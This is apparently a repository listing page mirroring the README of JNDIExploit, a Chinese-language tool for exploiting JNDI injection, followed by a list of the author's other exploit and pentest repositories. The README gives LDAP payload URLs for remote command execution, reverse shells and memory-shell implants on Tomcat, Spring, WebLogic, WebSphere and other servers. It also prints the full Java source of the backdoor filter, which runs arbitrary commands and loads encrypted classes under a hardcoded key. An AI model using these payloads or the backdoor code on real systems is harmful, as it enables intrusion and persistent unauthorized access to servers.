• Stars
    star
    266
  • Rank 154,103 (Top 4 %)
  • Language
    Java
  • Created almost 3 years ago
  • Updated almost 3 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。(from https://github.com/feihong-cs/JNDIExploit)

2021年12月13日 03:01

https://web.archive.org/web/20211213030144/https://github.com/feihong-cs/JNDIExploit/

JNDIExploit.v1.2.zip release download here or from web.archive.org ↑

JNDIExploit

一款用于 JNDI注入 利用的工具,大量参考/引用了 Rogue JNDI 项目的代码,支持直接植入内存shell,并集成了常见的bypass 高版本JDK的方式,适用于与自动化工具配合使用。

使用说明

使用 java -jar JNDIExploit.jar -h 查看参数说明,其中 --ip 参数为必选参数

Usage: java -jar JNDIExploit.jar [options]
  Options:
  * -i, --ip       Local ip address
    -l, --ldapPort Ldap bind port (default: 1389)
    -p, --httpPort Http bind port (default: 8080)
    -u, --usage    Show usage (default: false)
    -h, --help     Show this help

Dockerfile

git clone https://github.com/feihong-cs/JNDIExploit.git
cd ./JNDIExploit
docker build -t jndiexploit .
docker run -it \
    -p 1389:1389 \
    -e LDAP_PORT=1389 \
    -p 80:80 \
    -e HTTP_PORT=80 \
    jndiexploit

使用 java -jar JNDIExploit.jar -u 查看支持的 LDAP 格式

Supported LADP Queries
* all words are case INSENSITIVE when send to ldap server

[+] Basic Queries: ldap://127.0.0.1:1389/Basic/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Basic/Dnslog/[domain]
    ldap://127.0.0.1:1389/Basic/Command/[cmd]
    ldap://127.0.0.1:1389/Basic/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Basic/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Basic/TomcatEcho
    ldap://127.0.0.1:1389/Basic/SpringEcho
    ldap://127.0.0.1:1389/Basic/WeblogicEcho
    ldap://127.0.0.1:1389/Basic/TomcatMemshell1
    ldap://127.0.0.1:1389/Basic/TomcatMemshell2  ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/Basic/JettyMemshell
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell1
    ldap://127.0.0.1:1389/Basic/WeblogicMemshell2
    ldap://127.0.0.1:1389/Basic/JBossMemshell
    ldap://127.0.0.1:1389/Basic/WebsphereMemshell
    ldap://127.0.0.1:1389/Basic/SpringMemshell

[+] Deserialize Queries: ldap://127.0.0.1:1389/Deserialization/[GadgetType]/[PayloadType]/[Params], e.g.
    ldap://127.0.0.1:1389/Deserialization/URLDNS/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK1/Dnslog/[domain]
    ldap://127.0.0.1:1389/Deserialization/CommonsCollectionsK2/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils1/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/Deserialization/CommonsBeanutils2/TomcatEcho
    ldap://127.0.0.1:1389/Deserialization/C3P0/SpringEcho
    ldap://127.0.0.1:1389/Deserialization/Jdk7u21/WeblogicEcho
    ldap://127.0.0.1:1389/Deserialization/Jre8u20/TomcatMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2555/WeblogicMemshell1
    ldap://127.0.0.1:1389/Deserialization/CVE_2020_2883/WeblogicMemshell2    ---ALSO support other memshells

[+] TomcatBypass Queries
    ldap://127.0.0.1:1389/TomcatBypass/Dnslog/[domain]
    ldap://127.0.0.1:1389/TomcatBypass/Command/[cmd]
    ldap://127.0.0.1:1389/TomcatBypass/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/TomcatBypass/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/TomcatBypass/TomcatEcho
    ldap://127.0.0.1:1389/TomcatBypass/SpringEcho
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell1
    ldap://127.0.0.1:1389/TomcatBypass/TomcatMemshell2   ---need extra header [Shell: true]
    ldap://127.0.0.1:1389/TomcatBypass/SpringMemshell

[+] GroovyBypass Queries
    ldap://127.0.0.1:1389/GroovyBypass/Command/[cmd]
    ldap://127.0.0.1:1389/GroovyBypass/Command/Base64/[base64_encoded_cmd]

[+] WebsphereBypass Queries
    ldap://127.0.0.1:1389/WebsphereBypass/List/file=[file or directory]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Dnslog/[domain]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/[cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/Command/Base64/[base64_encoded_cmd]
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/ReverseShell/[ip]/[port]  ---windows NOT supported
    ldap://127.0.0.1:1389/WebsphereBypass/Upload/WebsphereMemshell
    ldap://127.0.0.1:1389/WebsphereBypass/RCE/path=[uploaded_jar_path]   ----e.g: ../../../../../tmp/jar_cache7808167489549525095.tmp
  • 目前支持的所有 PayloadType
    • Dnslog: 用于产生一个DNS请求,与 DNSLog平台配合使用,对Linux/Windows进行了简单的适配
    • Command: 用于执行命令,如果命令有特殊字符,支持对命令进行 Base64编码后传输
    • ReverseShell: 用于 Linux 系统的反弹shell,方便使用
    • TomcatEcho: 用于在中间件为 Tomcat 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
    • SpringEcho: 用于在框架为 SpringMVC/SpringBoot 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
    • WeblogicEcho: 用于在中间件为 Weblogic 时命令执行结果的回显,通过添加自定义header cmd: whoami 的方式传递想要执行的命令
    • TomcatMemshell1: 用于植入Tomcat内存shell, 支持Behinder shellBasic cmd shell
    • TomcatMemshell2: 用于植入Tomcat内存shell, 支持Behinder shellBasic cmd shell, 使用时需要添加额外的HTTP Header Shell: true, 推荐使用此方式
    • SpringMemshell: 用于植入Spring内存shell, 支持Behinder shellBasic cmd shell
    • WeblogicMemshell1: 用于植入Weblogic内存shell, 支持Behinder shellBasic cmd shell
    • WeblogicMemshell2: 用于植入Weblogic内存shell, 支持Behinder shellBasic cmd shell推荐使用此方式
    • JettyMemshell: 用于植入Jetty内存shell, 支持Behinder shellBasic cmd shell
    • JBossMemshell: 用于植入JBoss内存shell, 支持Behinder shellBasic cmd shell
    • WebsphereMemshell: 用于植入Websphere内存shell, 支持Behinder shellBasic cmd shell
  • 目前支持的所有 GadgetType
    • URLDNS
    • CommonsBeanutils1
    • CommonsBeanutils2
    • CommonsCollectionsK1
    • CommonsCollectionsK2
    • C3P0
    • Jdk7u21
    • Jre8u20
    • CVE_2020_2551
    • CVE_2020_2883
  • WebsphereBypass 中的 3 个动作:
    • list:基于XXE查看目标服务器上的目录或文件内容
    • upload:基于XXEjar协议将恶意jar包上传至目标服务器的临时目录
    • rce:加载已上传至目标服务器临时目录的jar包,从而达到远程代码执行的效果(这一步本地未复现成功,抛java.lang.IllegalStateException: For application client runtime, the client factory execute on a managed server thread is not allowed.异常,有复现成功的小伙伴麻烦指导下)

内存shell说明

  • 采用动态添加 Filter/Controller的方式,并将添加的Filter移动至FilterChain的第一位
  • 内存shell 的兼容性测试结果请参考 memshell 项目
  • Basic cmd shell 的访问方式为 /anything?type=basic&pass=[cmd]
  • Behinder shell 的访问方式需要修改冰蝎客户端(请参考 冰蝎改造之适配基于tomcat Filter的无文件webshell 的方式二自行修改),并在访问时需要添加 X-Options-Ai 头部,密码为rebeyond

植入的 Filter 代码如下:

public void doFilter(ServletRequest servletRequest, ServletResponse servletResponse, FilterChain filterChain) throws IOException, ServletException {
        System.out.println("[+] Dynamic Filter says hello");
        String k;
        Cipher cipher;
        if (servletRequest.getParameter("type") != null && servletRequest.getParameter("type").equals("basic")) {
            k = servletRequest.getParameter("pass");
            if (k != null && !k.isEmpty()) {
                cipher = null;
                String[] cmds;
                if (File.separator.equals("/")) {
                    cmds = new String[]{"/bin/sh", "-c", k};
                } else {
                    cmds = new String[]{"cmd", "/C", k};
                }

                String result = (new Scanner(Runtime.getRuntime().exec(cmds).getInputStream())).useDelimiter("\\A").next();
                servletResponse.getWriter().println(result);
            }
        } else if (((HttpServletRequest)servletRequest).getHeader("X-Options-Ai") != null) {
            try {
                if (((HttpServletRequest)servletRequest).getMethod().equals("POST")) {
                    k = "e45e329feb5d925b";
                    ((HttpServletRequest)servletRequest).getSession().setAttribute("u", k);
                    cipher = Cipher.getInstance("AES");
                    cipher.init(2, new SecretKeySpec((((HttpServletRequest)servletRequest).getSession().getAttribute("u") + "").getBytes(), "AES"));
                    byte[] evilClassBytes = cipher.doFinal((new BASE64Decoder()).decodeBuffer(servletRequest.getReader().readLine()));
                    Class evilClass = (Class)this.myClassLoaderClazz.getDeclaredMethod("defineClass", byte[].class, ClassLoader.class).invoke((Object)null, evilClassBytes, Thread.currentThread().getContextClassLoader());
                    Object evilObject = evilClass.newInstance();
                    Method targetMethod = evilClass.getDeclaredMethod("equals", ServletRequest.class, ServletResponse.class);
                    targetMethod.invoke(evilObject, servletRequest, servletResponse);
                }
            } catch (Exception var10) {
                var10.printStackTrace();
            }
        } else {
            filterChain.doFilter(servletRequest, servletResponse);
        }

    }

参考

More Repositories

1

Penetration_Testing_POC

渗透测试有关的POC、EXP、脚本、提权、小工具等---About penetration-testing python-script poc getshell csrf xss cms php-getshell domainmod-xss csrf-webshell cobub-razor cve rce sql sql-poc poc-exp bypass oa-getshell cve-cms
HTML
6,456
star
2

BurpSuite-collections

有关burpsuite的插件(非商店),文章以及使用技巧的收集(此项目不再提供burpsuite破解文件,如需要请在博客mrxn.net下载)---Collection of burpsuite plugins (non-stores), articles and tips for using Burpsuite, no crack version file
HTML
3,232
star
3

RedTeam_BlueTeam_HW

红蓝对抗以及护网相关工具和资料,内存shellcode(cs+msf)和内存马查杀工具
Java
2,196
star
4

hackbar2.1.3

the free firefox extions of hackbar v2.1.3 v2.2.9 v2.3.1,hackbar 插件未收费的免费版本。适用于chrome浏览器的HackBar-v2.2.6.zip,HackBar-v2.3.1.zip
669
star
5

BLACKHAT_Asia2023

Black Hat Asia 2023 PDF Public
569
star
6

BLACKHAT_USA2022

BLACKHAT USA2022 PDF Public
490
star
7

sunlogin_rce

向日葵 RCE
Go
476
star
8

subdomain_shell

一键调用subfinder+ksubdomain+httpx 强强联合 从域名发现-->域名验证-->获取域名标题、状态码以及响应大小 最后保存结果,简化重复操作命令
Shell
330
star
9

kms-server-deploy

一键搭建kms激活服务端&&Windows客户端一键激活脚本
Batchfile
233
star
10

cve-2022-23131

cve-2022-23131 zabbix-saml-bypass-exp
Python
151
star
11

spring-core-rce

CVE-2022-22965 : about spring core rce
Python
51
star
12

HCMendetool

HCM宏景加解密工具
Java
45
star
13

CVE-2022-24112

CVE-2022-24112:Apache APISIX apisix/batch-requests RCE
44
star
14

CVE-2021-42342

CVE-2021-42342 RCE
42
star
15

CVE-2022-40127

Apache Airflow < 2.4.0 DAG example_bash_operator RCE POC
40
star
16

burpsuite_pro_for_mac

A script to easily activate the macOS version of Burp Suite Professional [Free]
Shell
38
star
17

thinkphp_lang_RCE

about thinkphp lang RCE QVD-2022-46174 v6.0.1 <= Thinkphp <= v6.0.13 Thinkphp v5.0.x Thinkphp v5.1.x
38
star
18

ShellcodeLoader

该项目为Shellocde加载器,详细介绍了我们如何绕过防病毒软件,以及该工具如何使用
C
37
star
19

CVE-2022-24086

CVE-2022-24086 about Magento RCE
36
star
20

CrossC2

来自 gloxec 的 CrossC2 frameworkfork 备份 2.0版本
C
33
star
21

CVE-2023-28432

CVE-2023-28434 nuclei templates
32
star
22

CVE-2024-36401

Remote Code Execution (RCE) Vulnerability In Evaluating Property Name Expressions with multies ways to exploit
31
star
23

CVE-2022-21371

Oracle WebLogic Server 12.1.3.0.0 / 12.2.1.3.0 / 12.2.1.4.0 / 14.1.1.0.0 Local File Inclusion
27
star
24

CVE-2021-43798

CVE-2021-43798:Grafana 任意文件读取漏洞
25
star
25

CVE-2024-32113

Apache OFBIZ Path traversal leading to RCE POC[CVE-2024-32113 & CVE-2024-36104]
24
star
26

Joker

一款基于Http.sys的利用工具 ZhuriLab/Joker 备份
C++
23
star
27

CVE-2022-25064

Python
21
star
28

k3_packages_backup

k3的固件和插件备份仓库,Mac下解决音乐解锁插件证书到期,升级ssr-plus和v2ray版本,以及xray
Standard ML
15
star
29

CVE-2023-23333

SolarView Compact through 6.00 downloader.php commands injection (RCE) nuclei-templates
13
star
30

infohunter

pentester payload ,info hunte
PHP
12
star
31

check_proxy

Multi-threaded socks proxy checker written in Go!
Go
7
star
32

Onekey-Open-BT-panel-ssl-with-domain

宝塔(bt.cn)面板开启域名登录并且使用域名证书,解决浏览器信任证书问题,强迫症福音@_@
Shell
7
star
33

Kill_zsxq_Watermark

清除知识星球水印(包括文章、首页、topic等部分)
JavaScript
7
star
34

CVE-2024-36991

Path Traversal On The "/Modules/Messaging/" Endpoint In Splunk Enterprise On Windows
7
star
35

CNVD_Modify

适用于CNVD的篡改猴(Tampermonkey、Greasemonkey)脚本
JavaScript
6
star
36

CVE-2021-26855-d

Python
6
star
37

CVE-2022-3328

CVE-2022-3328 with CVE-2022-41974 and CVE-2022-41973
4
star
38

Mr-xn

my profile
4
star
39

Kali-install-docker

Docker-ce Install script for Kali
Shell
4
star
40

zhihuishu

2018新版智慧树视频自动播放刷课chrome插件
JavaScript
4
star
41

modify_freebuf_pic

支持t00ls.com文章图片放大&去除 freebuf.com 的文章部分的图片末尾追加的 !small ,让图片直接显示最佳尺寸而不是缩小版的,不需要点击放大查看,方便查看文章。
JavaScript
4
star
42

hysteria_mac.sh

hysteria shell script for Mac
Shell
3
star
43

CVE-2023-43482

TP-Link ER7206 Omada Gigabit VPN Router uhttpd freeStrategy Command injection Vulnerability
3
star
44

sqli-scripts

Scripts that make SQL injection faster, more convenient, and easier
Python
3
star
45

TG

About TG
2
star
46

server-bash-script

some useful server bash script
Python
2
star
47

scrapy_douban_top250movie

Use Python Scrapy crawl douban.com/top250
Python
1
star
48

seniverse_location

seniverse api location code
1
star
49

bt770back

bt770back
1
star